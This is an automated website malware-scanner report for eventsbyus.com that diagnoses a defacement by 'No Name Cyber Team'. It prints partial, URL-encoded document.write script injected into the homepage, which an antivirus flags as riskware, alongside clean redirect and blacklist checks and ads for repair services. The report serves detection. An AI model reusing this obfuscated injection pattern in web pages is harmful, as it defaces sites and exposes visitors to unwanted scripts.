New scan:

Malware Scanner report for eventsbyus.com

Malicious/Suspicious/Total urls checked
1/0/2
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
Found
Probably the website is defaced. The following signature was found:

!-- Hacked by No Name Cyber Team --  (16 websites defaced)

See details below

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://eventsbyus.com/
200 OK
Content-Length: 10184
Content-Type: text/html
suspicious
Malicious code - confirmed by antiviruses (see below)


<!-- No Name Cyber Team -->
<!--
document.write(unescape('%3C%68%74%6D%6C%20%6C%61%6E%67%3D%22%65%6E%22%3E%0A%3C%68%65%61%64%3E%3C%73%63%72%69%70%74%3E%69%66%28%74%79%70%65%6F%66%20%77%69%6E%64%6F%77%2E%5F%5F%77%73%75%6A%73%3D%3D%3D%27%75%6E%64%65%66%69%6E%65%64%27%29%7B%77%69%6E%64%6F%77%2E%5F%5F%77%73%75%6A%73%3D%35%30%36%34%3B%77%69%6E%64%6F%77%2E%5F%5F%77%73%75%6A%73%6E%3D%27%50%6C%75%67%49%6E%27%3B%77%69%6E%64%6F%77%2E%5F%5F%77%73%75%6A%73%73%3D%27%39%44%42%34%45%41
... 3021 bytes are skipped ...
%0A%09%09%09%49%6E%74%61%6E%4D%75%73%6C%69%6D%61%68%5F%34%30%34%20%2D%20%42%6C%61%63%6B%58%27%4F%70%73%30%30%37%20%2D%20%4C%61%74%75%6E%75%73%61%20%2D%20%42%52%4F%54%48%45%52%5F%53%55%43%4B%73%20%2D%20%4D%72%2E%50%68%6F%65%6E%69%78%31%33%33%37%20%0A%09%09%09%3C%62%72%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%62%6C%6F%67%2E%6E%6E%63%74%65%61%6D%2E%63%6F%6D%22%3E%43%6F%6E%74%61%63%74%20%55%73%3C%2F%61%3E%0A%09%09%3C%2F%64%69%76%3E%09%0A%3C%2F%62%6F%64%79%3E%0A%3C%2F%68%74%6D%6C%3E%0A'));

Antivirus reports:

NANO-Antivirus
Riskware.Script.BetterSurf.ctbzhb

Deface/Content modification. The following signature was found: !-- Hacked by No Name Cyber Team --

...[9732 bytes skipped]...
75%6E%75%73%61%20%2D%20%42%52%4F%54%48%45%52%5F%53%55%43%4B%73%20%2D%20%4D%72%2E%50%68%6F%65%6E%69%78%31%33%33%37%20%0A%09%09%09%3C%62%72%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%62%6C%6F%67%2E%6E%6E%63%74%65%61%6D%2E%63%6F%6D%22%3E%43%6F%6E%74%61%63%74%20%55%73%3C%2F%61%3E%0A%09%09%3C%2F%64%69%76%3E%09%0A%3C%2F%62%6F%64%79%3E%0A%3C%2F%68%74%6D%6C%3E%0A'));
//-->
</Script>
<!-- Hacked by No Name Cyber Team -->
<!-- zone-h.org/archive/notifier=No Name Cyber Team -->


http://eventsbyus.com/test404page.js
404 Not Found
Content-Length: 2692
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: eventsbyus.com

Result:
HTTP/1.1 200 OK
Cache-Control: max-age=3600, public, must-revalidate, proxy-revalidate
Connection: close
Date: Sat, 06 Dec 2014 23:32:06 GMT
Pragma: public
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 10184
Content-Type: text/html
Expires: Sun, 07 Dec 2014 00:32:06 GMT

...10184 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: eventsbyus.com
Referer: http://www.google.com/search?q=eventsbyus.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=eventsbyus.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://eventsbyus.com/

Result: eventsbyus.com is not infected or malware details are not published yet.